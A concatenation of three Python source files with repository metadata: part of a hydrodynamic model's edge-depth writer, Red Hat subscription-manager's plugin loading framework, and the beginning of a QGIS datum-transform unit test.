# proc has both cells, so get Nkc from the neighbor
self.sun.sendrecv_edges([a[:,7] for a in proc_edgedata])
## Optionally lower high edges to their higher cell neighbor.
if self.delete_friction_strips:
print "Removing friction strips by lowering edge depths"
for proc in range(self.sun.num_processors()):
edgedata = proc_edgedata[proc]
celldata = proc_celldata[proc]
edgedepths = proc_edgedepths[proc]
for j in range(len(edgedata)):
nc1,nc2 = edgedata[j,8:10].astype(int32)
face1,face2 = edgedata[j,10:12].astype(int32)
if nc2 < 0:
nc2 = nc1
face2 = face1
elif nc1 < 0:
nc1 = nc2
face1 = face2
df1 = celldata[nc1,14+face1]
df2 = celldata[nc2,14+face2]
# take the shallower cell
edgedepths[j] = min(celldata[nc1,3],celldata[nc2,3])
edgedata[j,6] = min(celldata[nc1,4],celldata[nc2,4])
# And we still have to fix those interprocessor edges:
self.sun.sendrecv_edges([a[:,6] for a in proc_edgedata]) # Nke
self.sun.sendrecv_edges(proc_edgedepths) # de
## Write it out
for proc in range(self.sun.num_processors()):
edgedata = proc_edgedata[proc]
celldata = proc_celldata[proc]
edgedepths = proc_edgedepths[proc]
# WRITE IT OUT
# maybe a little funky - sunreader keeps a reference to edgedata,
# and we have been passing this reference around the whole time -
# so no need to pass back in the modified edgedata.
# remove them first to avoid overwriting symlinked copies:
os.unlink(self.sun.file_path('celldata',proc))
os.unlink(self.sun.file_path('edgedata',proc))
self.sun.write_edgedata(proc)
self.sun.write_celldata(proc)
fp = open(self.sun.file_path('edgedepths',proc),'wt')
for j in range(len(edgedepths)):
fp.write("%.6f %.6f %.6f\n"%(edgedata[j,4], edgedata[j,5], edgedepths[j]))
fp.close()
if __name__ == '__main__':
edw = EdgeDepthWriter()
edw.run()
|
rustychris/stomel
|
src/edge_depths.py
|
Python
|
gpl-2.0
| 10,647
|
# Copyright (c) 2013 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import glob
import inspect
import logging
import os
import importlib.util
from iniparse import SafeConfigParser
from iniparse.compat import NoSectionError, NoOptionError
from rhsm.config import get_config_parser
from subscription_manager.base_plugin import SubManPlugin
# The API_VERSION constant defines the current plugin API version. It is used
# to decided whether or not plugins can be loaded. It is compared against the
# 'requires_api_version' attribute of each plugin. The version number has the
# format: "major_version.minor_version".
#
# For a plugin to be loaded, the major version required by the plugin must match
# the major version in API_VERSION. Additionally, the minor version in
# API_VERSION must be greater than or equal the minor version required by the
# plugin.
#
# If a change is made that breaks backwards compatibility with regard to the plugin
# API, the major version number must be incremented and the minor version number
# reset to 0. If a change is made that doesn't break backwards compatibility,
# then the minor number must be incremented.
API_VERSION = "1.1"
DEFAULT_SEARCH_PATH = "/usr/share/rhsm-plugins/"
DEFAULT_CONF_PATH = "/etc/rhsm/pluginconf.d/"
cfg = get_config_parser()
log = logging.getLogger(__name__)
class PluginException(Exception):
"""Base exception for rhsm plugins."""
def _add_message(self, repr_msg):
if hasattr(self, "msg") and self.msg:
repr_msg = "\n".join([repr_msg, "Message: %s" % self.msg])
return repr_msg
class PluginImportException(PluginException):
"""Raised when a SubManPlugin derived class can not be imported."""
def __init__(self, module_file, module_name, msg=None):
self.module_file = module_file
self.module_name = module_name
self.msg = msg
def __str__(self):
repr_msg = "Plugin \"%s\" can't be imported from file %s" % \
(self.module_name, self.module_file)
return self._add_message(repr_msg)
class PluginModuleImportException(PluginImportException):
"""Raise when a plugin module can not be imported."""
class PluginModuleImportApiVersionMissingException(PluginImportException):
"""Raised when a plugin module does not include a 'requires_api_version'."""
def __str__(self):
repr_msg = """Plugin module "%s" in %s has no API version.
'requires_api_version' should be set.""" % \
(self.module_name, self.module_file)
return self._add_message(repr_msg)
class PluginModuleImportApiVersionException(PluginImportException):
"""Raised when a plugin module's 'requires_api_version' can not be met."""
def __init__(self, module_file, module_name, module_ver, api_ver, msg=None):
self.module_file = module_file
self.module_name = module_name
self.module_ver = module_ver
self.api_ver = api_ver
self.msg = msg
def __str__(self):
repr_msg = "Plugin \"%s\" requires API version %s. Supported API is %s" % \
(self.module_name, self.module_ver, self.api_ver)
return self._add_message(repr_msg)
class PluginConfigException(PluginException):
"""Raised when a PluginConfig fails to load or read a config file."""
def __init__(self, plugin_name, msg=None):
self.plugin_name = plugin_name
self.msg = msg
def __str__(self):
repr_msg = "Cannot load configuration for plugin \"%s\"" % (self.plugin_name)
return self._add_message(repr_msg)
# if code try's to run a hook for a slot_name that doesn't exist
class SlotNameException(Exception):
"""Raised when PluginManager.run() is called with a unknown slot_name."""
def __init__(self, slot_name):
self.slot_name = slot_name
def __str__(self):
return "slot name %s does not have a conduit to handle it" % self.slot_name
class BaseConduit(object):
"""An API entry point for rhsm plugins.
Conduit()'s are used to provide access to the data a SubManPlugin may need.
Each 'slot_name' has a BaseConduit() subclass associated with it by PluginManager().
Whenever a slot is reached, PluginManager will find all the SubManPlugin methods
that handle the slot, as well as any Conduit() that is mapped to the slot.
PluginManager.run(slot_name, kwargs) finds the proper Conduit for slot_name,
then creates an instance, passing in the values of kwargs. Then PluginManager.run
calls the SubManPlugin hook associated, passing it the Conduit().
Conduits provide access to subscription-manager configuration, as well
as a logger object.
Conduit() subclasses can provide additional methods.
Note the conf instance is expected to be a PluginConfig, and/or
have a 'parser' attribute that looks like a ConfigParser.SafeConfigParser.
Args:
clazz: A SubManPlugin subclass that will use this Conduit()
conf: A PluginConf for the class passed as clazz
Attributes:
slots: A list of slot_name strings this Conduit() will handle
log: a logger handler
"""
slots = []
# clazz is the class object for class instance of the object the hook method maps too
def __init__(self, clazz, conf=None):
if conf:
self._conf = conf
else:
self._conf = clazz.conf
# maybe useful to have a per conduit/per plugin logger space
self.log = logging.getLogger(clazz.__name__)
def conf_string(self, section, option, default=None):
"""get string from plugin config
Args:
section: config section name
option: config option name
default: if section or option are not found,
return default. None if not
specified.
Returns:
a string. In the case of error, default
is returned. If default is not specified,
None is returned.
"""
try:
return self._conf.parser.get(section, option)
except (NoSectionError, NoOptionError):
if default is None:
return None
return str(default)
def conf_bool(self, section, option, default=None):
"""get boolean value from plugin config
Args:
section: config section name
option: config option name
default: if section or option are not found,
return default.
Raises:
ValueError: value requested is not a boolean
Returns:
a python boolean. In the case of error, default
is returned. If default is not specified and
there is an error, a ValueError is raised.
"""
try:
return self._conf.parser.getboolean(section, option)
except (NoSectionError, NoOptionError):
if default is True:
return True
elif default is False:
return False
else:
raise ValueError("Boolean value expected")
def conf_int(self, section, option, default=None):
"""get integer value from plugin config
Args:
section: config section name
option: config option name
default: if section or option are not found,
return default.
Raises:
ValueError: value requested can not be made into an integer
Returns:
a python integer. In the case of error, default
is returned. If default is not specified, a
ValueError is raised.
"""
try:
return self._conf.parser.getint(section, option)
except (NoSectionError, NoOptionError):
try:
val = int(default)
except (ValueError, TypeError):
raise ValueError("Integer value expected")
return val
def conf_float(self, section, option, default=None):
"""get float value from plugin config
Args:
section: config section name
option: config option name
default: if section or option are not found,
return default.
Raises:
ValueError: value requested can not be made into
a float
Returns:
a python float. In the case of error, default
is returned. If default is not specified, a
ValueError is raised.
"""
try:
return self._conf.parser.getfloat(section, option)
except (NoSectionError, NoOptionError):
try:
val = float(default)
except (ValueError, TypeError):
raise ValueError("Float value expected")
return val
class RegistrationConduit(BaseConduit):
"""Conduit for uses with registration."""
slots = ['pre_register_consumer']
def __init__(self, clazz, name, facts):
"""init for RegistrationConduit
Args:
name: ??
facts: a dictionary of system facts
"""
super(RegistrationConduit, self).__init__(clazz)
self.name = name
self.facts = facts
class PostRegistrationConduit(BaseConduit):
"""Conduit for use with post registration."""
slots = ['post_register_consumer']
def __init__(self, clazz, consumer, facts):
"""init for PostRegistrationConduit
Args:
consumer: an object representing the
registered consumer
facts: a dictionary of system facts
"""
super(PostRegistrationConduit, self).__init__(clazz)
self.consumer = consumer
self.facts = facts
class ProductConduit(BaseConduit):
"""Conduit for use with plugins that handle product id functions."""
slots = ['pre_product_id_install', 'post_product_id_install']
def __init__(self, clazz, product_list):
"""init for ProductConduit
Args:
product_list: A list of ProductCertificate objects
"""
super(ProductConduit, self).__init__(clazz)
self.product_list = product_list
class ProductUpdateConduit(BaseConduit):
"""Conduit for use with plugins that handle product id update functions."""
slots = ['pre_product_id_update', 'post_product_id_update']
def __init__(self, clazz, product_list):
"""init for ProductUpdateConduit
Args:
product_list: A list of ProductCertificate objects
"""
super(ProductUpdateConduit, self).__init__(clazz)
self.product_list = product_list
class FactsConduit(BaseConduit):
"""Conduit for collecting facts."""
slots = ['post_facts_collection']
def __init__(self, clazz, facts):
"""init for FactsConduit
Args:
facts: a dictionary of system facts
"""
super(FactsConduit, self).__init__(clazz)
self.facts = facts
class UpdateContentConduit(BaseConduit):
"""Conduit for updating content."""
slots = ['update_content']
def __init__(self, clazz, reports, ent_source):
"""init for UpdateContentConduit.
Args:
reports: a list of reports
ent_source: a EntitlementSource instance
"""
super(UpdateContentConduit, self).__init__(clazz)
self.reports = reports
self.ent_source = ent_source
class SubscriptionConduit(BaseConduit):
"""Conduit for subscription info."""
slots = ['pre_subscribe']
def __init__(self, clazz, consumer_uuid, pool_id, quantity):
"""init for SubscriptionConduit
Args:
consumer_uuid: the UUID of the consumer being subscribed
pool_id: the id of the pool the subscription will come from (None if 'auto' is False)
quantity: the quantity to consume from the pool (None if 'auto' is False).
auto: is this an auto-attach/healing event.
"""
super(SubscriptionConduit, self).__init__(clazz)
self.consumer_uuid = consumer_uuid
self.pool_id = pool_id
self.quantity = quantity
class PostSubscriptionConduit(BaseConduit):
slots = ['post_subscribe']
def __init__(self, clazz, consumer_uuid, entitlement_data):
"""init for PostSubscriptionConduit
Args:
consumer_uuid: the UUID of the consumer subscribed
entitlement_data: the data returned by the server
"""
super(PostSubscriptionConduit, self).__init__(clazz)
self.consumer_uuid = consumer_uuid
self.entitlement_data = entitlement_data
class AutoAttachConduit(BaseConduit):
slots = ['pre_auto_attach']
def __init__(self, clazz, consumer_uuid):
"""
init for AutoAttachConduit
Args:
consumer_uuid: the UUID of the consumer being auto-subscribed
"""
super(AutoAttachConduit, self).__init__(clazz)
self.consumer_uuid = consumer_uuid
class PostAutoAttachConduit(PostSubscriptionConduit):
slots = ['post_auto_attach']
def __init__(self, clazz, consumer_uuid, entitlement_data):
"""init for PostAutoAttachConduit
Args:
consumer_uuid: the UUID of the consumer subscribed
entitlement_data: the data returned by the server
"""
super(PostAutoAttachConduit, self).__init__(clazz, consumer_uuid, entitlement_data)
class PluginConfig(object):
"""Represents configuation for each rhsm plugin.
Attributes:
plugin_conf_path: where plugin config files are found
plugin_key: a string identifier for plugins, For ex, 'facts.FactsPlugin'
Used to find the configuration file.
"""
plugin_key = None
def __init__(self, plugin_key,
plugin_conf_path=None):
"""init for PluginConfig.
Args:
plugin_key: string id for class
plugin_conf_path: string file path to where plugin config files are found
Raises:
PluginConfigException: error when finding or loading plugin config
"""
self.plugin_conf_path = plugin_conf_path
self.plugin_key = plugin_key
self.conf_files = []
self.parser = SafeConfigParser()
# no plugin_conf_path uses the default empty list of conf files
if self.plugin_conf_path:
self._get_config_file_path()
try:
self.parser.read(self.conf_files)
except Exception as e:
raise PluginConfigException(self.plugin_key, e)
def _get_config_file_path(self):
conf_file = os.path.join(self.plugin_conf_path, self.plugin_key + ".conf")
if not os.access(conf_file, os.R_OK):
raise PluginConfigException(self.plugin_key, "Unable to find configuration file")
# iniparse can handle a list of files, inc an empty list
# reading an empty list is basically the None constructor
self.conf_files.append(conf_file)
def is_plugin_enabled(self):
"""returns True if the plugin is enabled in it's config."""
try:
enabled = self.parser.getboolean('main', 'enabled')
except Exception as e:
raise PluginConfigException(self.plugin_key, e)
if not enabled:
log.debug("Not loading \"%s\" plugin as it is disabled" % self.plugin_key)
return False
return True
def __str__(self):
buf = "plugin_key: %s\n" % (self.plugin_key)
for conf_file in self.conf_files:
buf = buf + "config file: %s\n" % conf_file
# config file entries
buf = buf + str(self.parser.data)
return buf
class PluginHookRunner(object):
"""Encapsulates a Conduit() instance and a bound plugin method.
PluginManager.runiter() returns an iterable that will yield
a PluginHookRunner for each plugin hook to be triggered.
"""
def __init__(self, conduit, func):
self.conduit = conduit
self.func = func
def run(self):
try:
self.func(self.conduit)
except Exception as e:
log.exception(e)
raise
# NOTE: need to be super paranoid here about existing of cfg variables
# BasePluginManager with our default config info
class BasePluginManager(object):
"""Finds, load, and provides acccess to subscription-manager plugins."""
def __init__(self, search_path=None, plugin_conf_path=None):
"""init for BasePluginManager().
attributes:
conduits: BaseConduit subclasses that can register slots
search_path: where to find plugin modules
plugin_conf_path: where to find plugin config files
_plugins: map of a plugin_key to a SubManPlugin instance
_plugin_classes: list of plugin classes found
_slot_to_funcs: map of a slotname to a list of plugin methods that handle it
_slot_to_conduit: map of a slotname to a Conduit() that is passed to the slot
associated
"""
self.search_path = search_path
self.plugin_conf_path = plugin_conf_path
# list of modules to load plugins from
self.modules = self._get_modules()
# we track which modules we try to load plugins from
self._modules = {}
# self._plugins is mostly for bookkeeping, it's a dict
# that maps 'plugin_key':instance
# 'plugin_key', aka plugin_module.plugin_class
# instance is the instaniated plugin class
self._plugins = {}
# all found plugin classes, including classes that
# are disable, and will not be instantiated
self._plugin_classes = {}
self.conduits = []
# maps a slot_name to a list of methods from a plugin class
self._slot_to_funcs = {}
self._slot_to_conduit = {}
# find our list of conduits
self.conduits = self._get_conduits()
# populate self._slot_to_conduit
# and create keys for self._slot_to_func
self._populate_slots()
# populate self._plugins with plugins in modules in self.modules
self._import_plugins()
def _get_conduits(self):
"""Needs to be implemented in subclass.
Returns:
A list of Conduit classes
"""
return []
def _get_modules(self):
"""Needs to be implemented in subclass.
Returns:
A list of modules to load plugins classes from
"""
return []
def _import_plugins(self):
"""Needs to be implemented in subclass.
This loads plugin modules, checks them, and loads plugins
from them with self.add_plugins_from_module
"""
# by default, we create PluginConfig's as needed, so no need for
# plugin_to_config_map to be passed in
self.add_plugins_from_modules(self.modules)
log.debug("loaded plugin modules: %s" % self.modules)
log.debug("loaded plugins: %s" % self._plugins)
def _populate_slots(self):
for conduit_class in self.conduits:
slots = conduit_class.slots
for slot in slots:
self._slot_to_conduit[slot] = conduit_class
self._slot_to_funcs[slot] = []
def add_plugins_from_modules(self, modules, plugin_to_config_map=None):
"""Add SubMan plugins from a list of modules
Args:
modules: a list of python module objects
plugin_to_config_map: a dict mapping a plugin_key to a PluginConfig
object. If a plugin finds it's config in here,
that is used instead of creating a new PluginConfig()
(which needs an actual file in plugin_conf_dir)
Side effects:
whatever add_plugins_from_module does to self
"""
for module in modules:
try:
self.add_plugins_from_module(module,
plugin_to_config_map=plugin_to_config_map)
except PluginException as e:
log.exception(e)
log.error(e)
def add_plugins_from_module(self, module, plugin_to_config_map=None):
"""add SubManPlugin based plugins from a module.
Will also look for a PluginConfig() associated with the
SubManPlugin classes. Config files should be in self.plugin_conf_path
and named in the format "moduleName.plugin_class_name.conf"
Args:
module: an import python module object, that contains
SubManPlugin subclasses.
plugin_to_config_map: a dict mapping a plugin_key to a PluginConfig
object.If a plugin finds it's config in here,
that is used instead of creating a new PluginConfig()
Side Effects:
self._modules is populated
whatever add_plugin_class does
Raises:
PluginException: multiple plugins with the same name
"""
# track the modules we try to load plugins from
# we'll add plugin classes if we find them
self._modules[module] = []
# verify we are a class, and in particular, a subclass
# of SubManPlugin
def is_plugin(c):
return inspect.isclass(c) and c.__module__ == module.__name__ and issubclass(c, SubManPlugin)
# note we sort the list of plugin classes, since that potentially
# alters order hooks are mapped to slots
plugin_classes = sorted(inspect.getmembers(module, is_plugin))
# find all the plugin classes with valid configs first
# then add them, so we skip the module if a class has a bad config
found_plugin_classes = []
for _name, clazz in sorted(plugin_classes):
# We could have the module conf here, and check in that
# instead of a per class config. We would not be able to
# override a disable module per class, but that's probably okay
found_plugin_classes.append(clazz)
for plugin_class in found_plugin_classes:
# NOTE: we currently do not catch plugin init exceptions
# here, and let them bubble. But we could...? that would
# let some classes from a module fail
self.add_plugin_class(plugin_class,
plugin_to_config_map=plugin_to_config_map)
def add_plugin_class(self, plugin_clazz, plugin_to_config_map=None):
"""Add a SubManPlugin and PluginConfig class to PluginManager.
Args:
plugin_clazz: A SubManPlugin child class, with a
.conf PluginConfig() class
plugin_to_config_map: a dict mapping a plugin_key to a PluginConfig
object.If a plugin finds it's config in here,
that is used instead of creating a new PluginConfig()
Side effects:
self._plugin_classes is populated with all found plugin classes
self._modules is populated with plugin classes per plugin module
self._plugins is populated with valid and enabled plugin instances
Raises:
PluginException: multiple plugins with the same name
"""
# either look up what we were passed, or create a new PluginConfig
# default is to create a PluginConfig
plugin_conf = self._get_plugin_config(plugin_clazz,
plugin_to_config_map=plugin_to_config_map)
# associate config with plugin class
# NOTE: the plugin_class has a PluginConfig instance for it's conf
plugin_clazz.conf = plugin_conf
plugin_key = plugin_clazz.conf.plugin_key
# if plugin is not enabled, it doesnt get added, but
# we do track it as a plugin_class we looked at
if not plugin_clazz.conf.is_plugin_enabled():
self._plugin_classes[plugin_key] = plugin_clazz
log.debug("%s was disabled via it's config: %s" % (plugin_clazz, plugin_clazz.conf))
return
# this is an enabled plugin, so track it's module as well
# if we havent already
self._track_plugin_class_to_modules(plugin_clazz)
# if we fail to init any plugin classes, the exceptions are not
# caught
instance = plugin_clazz()
# track it's instance
if plugin_key not in self._plugins:
self._plugins[plugin_key] = instance
else:
# This shouldn't ever happen
raise PluginException("Two or more plugins with the name \"%s\" exist "
"in the plugin search path" %
plugin_clazz.__name__)
# this is a valid plugin, with config, that instantiates, and is not a dupe
self._plugin_classes[plugin_key] = plugin_clazz
# look for any plugin class methods that match the name
# format of slot_name_hook
# only look for func's that match slot's we have in our conduits
class_is_used = False
for slot in list(self._slot_to_funcs.keys()):
func_name = slot + "_hook"
if instance.all_slots or hasattr(instance, func_name):
# FIXME: document that all_hooks could result in calls to
# plugin class for methods that map to slots that it may
# not have known about. aka, all_hooks is complicated
# verify the hook is a callable
if callable(getattr(instance, func_name)):
self._slot_to_funcs[slot].append(getattr(instance, func_name))
class_is_used = True
else:
# found the attribute, but it is not callable
# note we let AttributeErrors bubble up
log.debug("%s plugin does not have a callable() method %s" % (plugin_key, func_name))
# if we don't find any place to use this class, note that on the plugin class
if class_is_used:
plugin_clazz.found_slots_for_hooks = True
def _track_plugin_class_to_modules(self, plugin_clazz):
"""Keep a map of plugin classes loaded from each plugin module."""
if plugin_clazz.__module__ not in self._modules:
self._modules[plugin_clazz.__module__] = []
self._modules[plugin_clazz.__module__].append(plugin_clazz)
def run(self, slot_name, **kwargs):
"""For slot_name, run the registered hooks with kwargs.
Args:
slot_name: a string of the slot_name. Typically of form
'post_someplace_something'
kwargs: kwargs dict of arguments to pass to the SubManPlugin
hook methods.These are will be passed to the Conduit
instance associated with 'slot_name'
Returns:
Nothing.
Raises:
SlotNameException: slot_name isn't found
(Anything else is plugin and conduit specific)
"""
for runner in self.runiter(slot_name, **kwargs):
runner.run()
def runiter(self, slot_name, **kwargs):
"""Return an iterable of PluginHookRunner objects.
The iterable will return a PluginHookRunner object
for each plugin hook mapped to slot_name. Multiple plugins
with hooks for the same slot will result in multiple
PluginHookRunners in the iterable.
See run() docs for what to expect from PluginHookRunner.run().
"""
# slot's called should always exist here, if not
if slot_name not in self._slot_to_funcs:
raise SlotNameException(slot_name)
for func in self._slot_to_funcs[slot_name]:
module = inspect.getmodule(func)
func_module_name = getattr(func, '__module__')
if not func_module_name:
if module:
func_module_name = module.__name__
else:
func_module_name = 'unknown_module'
func_class_name = func.__self__.__class__.__name__
plugin_key = ".".join([func_module_name, func_class_name])
log.debug("Running %s in %s" % (func.__name__, plugin_key))
# resolve slot_name to conduit
# FIXME: handle cases where we don't have a conduit for a slot_name
# (should be able to handle this since we map those at the same time)
conduit = self._slot_to_conduit[slot_name]
try:
# create a Conduit
# FIXME: handle cases where we can't create a Conduit()
conduit_instance = conduit(func.__self__.__class__, **kwargs)
# TypeError tends to mean we provided the wrong kwargs for this
# conduit
# if we get an Exception above, should we exit early, or
# continue onto other hooks. A conduit could fail for
# something specific to func.__class__, but unlikely
except Exception as e:
log.exception(e)
raise
runner = PluginHookRunner(conduit_instance, func)
yield runner
def _get_plugin_config(self, plugin_clazz, plugin_to_config_map=None):
"""Get a PluginConfig for plugin_class, creating it if need be.
If we have an entry in plugin_to_config_map for plugin_class,
return that PluginConfig. Otherwise, we create a PluginConfig()
Mote that PluginConfig() will expect to find a config file in
self.plugin_conf_path, and will fail if that is not the case.
Args:
plugin_clazz: A SubManPlugin subclass
plugin_to_config_map: A map of plugin_key to PluginConfig objects
Returns:
A PluginConfig() object
"""
if plugin_to_config_map:
if plugin_clazz.get_plugin_key() in plugin_to_config_map:
return plugin_to_config_map[plugin_clazz.get_plugin_key()]
return PluginConfig(plugin_clazz.get_plugin_key(), self.plugin_conf_path)
def get_plugins(self):
"""list of plugins."""
return self._plugin_classes
def get_slots(self):
"""list of slots
Ordered by conduit name, for presentation.
"""
# I'm sure a clever list comprension could replace this with one line
#
# The default sort of slots is pure lexical, so all the pre's come
# first, which is weird. So this just sorts the slots by conduit name,
# then by slot name
conduit_to_slots = {}
for slot, conduit in list(self._slot_to_conduit.items()):
# sigh, no defaultdict on 2.4
if conduit not in conduit_to_slots:
conduit_to_slots[conduit] = []
conduit_to_slots[conduit].append(slot)
sorted_slots = []
for conduit in sorted(conduit_to_slots.keys(), key=lambda c: str(c)):
for slot in sorted(conduit_to_slots[conduit]):
sorted_slots.append(slot)
return sorted_slots
class PluginManager(BasePluginManager):
"""Finds, load, and provides acccess to subscription-manager plugins
using subscription-manager default plugin search path and plugin
conf path.
"""
default_search_path = DEFAULT_SEARCH_PATH
default_conf_path = DEFAULT_CONF_PATH
def __init__(self, search_path=None, plugin_conf_path=None):
"""init PluginManager
Args:
search_path: if not specified, use the configured 'pluginDir'
plugin_conf_path: if not specified, use the configured 'pluginConfDir'
"""
cfg_search_path = None
cfg_conf_path = None
try:
cfg_search_path = cfg.get("rhsm", "pluginDir")
cfg_conf_path = cfg.get("rhsm", "pluginConfDir")
except NoOptionError:
log.warning("no config options found for plugin paths, using defaults")
cfg_search_path = None
cfg_conf_path = None
init_search_path = search_path or cfg_search_path or self.default_search_path
init_plugin_conf_path = plugin_conf_path or cfg_conf_path \
or self.default_conf_path
super(PluginManager, self).__init__(search_path=init_search_path,
plugin_conf_path=init_plugin_conf_path)
def _get_conduits(self):
"""get subscription-manager specific plugin conduits."""
# we should be able to collect this from the sub classes of BaseConduit
return [
BaseConduit, ProductConduit, ProductUpdateConduit,
RegistrationConduit, PostRegistrationConduit,
FactsConduit, SubscriptionConduit,
UpdateContentConduit,
PostSubscriptionConduit,
AutoAttachConduit, PostAutoAttachConduit,
]
def _get_modules(self):
module_files = self._find_plugin_module_files(self.search_path)
plugin_modules = self._load_plugin_module_files(module_files)
return plugin_modules
# subman specific module/plugin loading
def _find_plugin_module_files(self, search_path):
"""Load all the plugins in the search path.
Raise:
PluginException: plugin load fails
"""
module_files = []
if not os.path.isdir(search_path):
log.error("Could not find %s for plugin import" % search_path)
# NOTE: if this is not found, we don't load any plugins
# so self._plugins/_plugins_funcs are empty
return []
mask = os.path.join(search_path, "*.py")
for module_file in sorted(glob.glob(mask)):
module_files.append(module_file)
# for consistency
module_files.sort()
return module_files
def _load_plugin_module_files(self, module_files):
modules = []
for module_file in module_files:
try:
modules.append(self._load_plugin_module_file(module_file))
except PluginException as e:
log.error(e)
return modules
def _load_plugin_module_file(self, module_file):
"""Loads SubManPlugin class from a module file.
Args:
module_file: file path to a python module containing SubManPlugin based classes
Raises:
PluginImportException: module_file could not be imported
PluginImportApiVersionMissingException: module_file has not api version requirement
PluginImportApiVersionException: modules api version requirement can not be met
"""
dir_path, module_name = os.path.split(module_file)
module_name = module_name.split(".py")[0]
try:
spec = importlib.util.spec_from_file_location(module_name, module_file)
loaded_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(loaded_module)
# we could catch BaseException too for system exit
except Exception as e:
log.exception(e)
raise PluginModuleImportException(module_file, module_name)
# FIXME: look up module conf, so we can enable entire plugin modules
if not hasattr(loaded_module, "requires_api_version"):
raise PluginModuleImportApiVersionMissingException(module_file, module_name,
"Plugin doesn't specify required API version")
if not api_version_ok(API_VERSION, loaded_module.requires_api_version):
raise PluginModuleImportApiVersionException(module_file, module_name,
module_ver=loaded_module.requires_api_version,
api_ver=API_VERSION)
return loaded_module
def parse_version(api_version):
"""parse an API version string into major and minor version strings."""
maj_ver, min_ver = api_version.split('.')
return int(maj_ver), int(min_ver)
def api_version_ok(a, b):
"""
Return true if API version "a" supports API version "b"
"""
a = parse_version(a)
b = parse_version(b)
if a[0] != b[0]:
return False
if a[1] >= b[1]:
return True
return False
|
candlepin/subscription-manager
|
src/subscription_manager/plugins.py
|
Python
|
gpl-2.0
| 37,132
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsDatumTransforms.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Nyall Dawson'
__date__ = '2019-05-25'
__copyright__ = 'Copyright 2019, The QGIS Project'
from qgis.core import (
QgsProjUtils,
QgsCoordinateReferenceSystem,
QgsDatumTransform
)
from qgis.testing import (start_app,
unittest,
)
from utilities import unitTestDataPath
start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestPyQgsDatumTransform(unittest.TestCase):
@unittest.skipIf(QgsProjUtils.projVersionMajor() < 6, 'Not a proj6 build')
def testOperations(self):
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem(),
QgsCoordinateReferenceSystem())
self.assertEqual(ops, [])
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3111'),
QgsCoordinateReferenceSystem())
self.assertEqual(ops, [])
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem(),
QgsCoordinateReferenceSystem('EPSG:3111'))
self.assertEqual(ops, [])
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3111'),
QgsCoordinateReferenceSystem('EPSG:3111'))
self.assertEqual(len(ops), 1)
self.assertTrue(ops[0].name)
self.assertEqual(ops[0].proj, '+proj=noop')
self.assertEqual(ops[0].accuracy, 0.0)
self.assertTrue(ops[0].isAvailable)
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3111'),
QgsCoordinateReferenceSystem('EPSG:4283'))
self.assertEqual(len(ops), 1)
self.assertTrue(ops[0].name)
self.assertEqual(ops[0].proj, '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertEqual(ops[0].accuracy, -1.0)
self.assertTrue(ops[0].isAvailable)
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3111'),
QgsCoordinateReferenceSystem('EPSG:28355'))
self.assertEqual(len(ops), 1)
self.assertTrue(ops[0].name)
self.assertEqual(ops[0].proj, '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=utm +zone=55 +south +ellps=GRS80')
self.assertEqual(ops[0].accuracy, 0.0)
self.assertTrue(ops[0].isAvailable)
# uses a grid file
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:4283'),
QgsCoordinateReferenceSystem('EPSG:7844'))
self.assertGreaterEqual(len(ops), 5)
op1_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=push +v_3 +step +proj=cart +ellps=GRS80 +step +proj=helmert +x=0.06155 +y=-0.01087 +z=-0.04019 +rx=-0.0394924 +ry=-0.0327221 +rz=-0.0328979 +s=-0.009994 +convention=coordinate_frame +step +inv +proj=cart +ellps=GRS80 +step +proj=pop +v_3 +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
self.assertTrue(ops[op1_index].name)
self.assertEqual(ops[op1_index].proj, '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=push +v_3 +step +proj=cart +ellps=GRS80 +step +proj=helmert +x=0.06155 +y=-0.01087 +z=-0.04019 +rx=-0.0394924 +ry=-0.0327221 +rz=-0.0328979 +s=-0.009994 +convention=coordinate_frame +step +inv +proj=cart +ellps=GRS80 +step +proj=pop +v_3 +step +proj=unitconvert +xy_in=rad +xy_out=deg')
self.assertTrue(ops[op1_index].isAvailable)
self.assertEqual(ops[op1_index].accuracy, 0.01)
self.assertEqual(len(ops[op1_index].grids), 0)
if QgsProjUtils.projVersionMajor() == 6:
op2_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_and_distortion.gsb +step +proj=unitconvert +xy_in=rad +xy_out=deg'][0]
else:
op2_index = [i for i in range(len(ops)) if ops[
i].proj == '+proj=pipeline +step +proj=unitconvert +xy_in=deg +xy_out=rad +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_and_distortion.tif +step +proj=unitconvert +xy_in=rad +xy_out=deg'][
0]
self.assertTrue(ops[op2_index].name)
if QgsProjUtils.projVersionMajor() == 6:
